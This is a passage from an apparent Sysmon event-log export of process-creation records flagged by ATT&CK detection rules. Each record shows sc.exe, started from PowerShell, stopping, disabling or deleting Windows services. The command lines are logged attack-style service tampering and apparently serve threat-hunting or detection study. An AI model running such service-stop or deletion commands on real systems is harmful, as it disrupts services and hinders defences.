MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.481"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-001044292b00}"",""processId"":""4996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.608",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.208 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-00106e242b00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.215375300Z"",""eventRecordID"":""3174"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.208\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-00106e242b00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.208"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-00106e242b00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.671",8,"ATT&CK T1489: Stop Windows 
Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:27.743 +ProcessGuid: {df9fc3d3-b3cf-5ecf-0000-00108d1e2b00} +ProcessId: 1852 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:27.746783000Z"",""eventRecordID"":""3171"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:27.743\r\nProcessGuid: {df9fc3d3-b3cf-5ecf-0000-00108d1e2b00}\r\nProcessId: 1852\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: 
Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:27.743"",""processGuid"":""{df9fc3d3-b3cf-5ecf-0000-00108d1e2b00}"",""processId"":""1852"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.648",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:27.600 +ProcessGuid: {df9fc3d3-b3cf-5ecf-0000-00104b1d2b00} +ProcessId: 6016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""NetMsmqActiv Media NVIDIA"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""NetMsmqActiv Media NVIDIA\"" Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:27.643888300Z"",""eventRecordID"":""3170"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:27.600\r\nProcessGuid: {df9fc3d3-b3cf-5ecf-0000-00104b1d2b00}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""NetMsmqActiv Media NVIDIA\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:27.600"",""processGuid"":""{df9fc3d3-b3cf-5ecf-0000-00104b1d2b00}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager 
Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""NetMsmqActiv Media NVIDIA\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.630",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:27.206 +ProcessGuid: {df9fc3d3-b3cf-5ecf-0000-0010eb1a2b00} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:27.210380900Z"",""eventRecordID"":""3168"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:27.206\r\nProcessGuid: {df9fc3d3-b3cf-5ecf-0000-0010eb1a2b00}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:27.206"",""processGuid"":""{df9fc3d3-b3cf-5ecf-0000-0010eb1a2b00}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.514",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.455 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-001079162b00} +ProcessId: 696 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.458180000Z"",""eventRecordID"":""3165"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.455\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-001079162b00}\r\nProcessId: 696\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.455"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-001079162b00}"",""processId"":""696"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.437",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.341 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010de132b00} +ProcessId: 4240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHelp64 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.344226400Z"",""eventRecordID"":""3163"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.341\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010de132b00}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
